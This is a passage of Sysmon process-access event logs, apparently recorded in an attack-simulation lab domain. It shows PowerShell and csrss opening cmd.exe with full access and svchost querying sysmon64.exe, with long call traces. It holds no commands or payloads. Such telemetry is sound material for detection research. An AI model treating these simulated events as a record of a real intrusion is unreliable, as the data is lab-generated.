f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 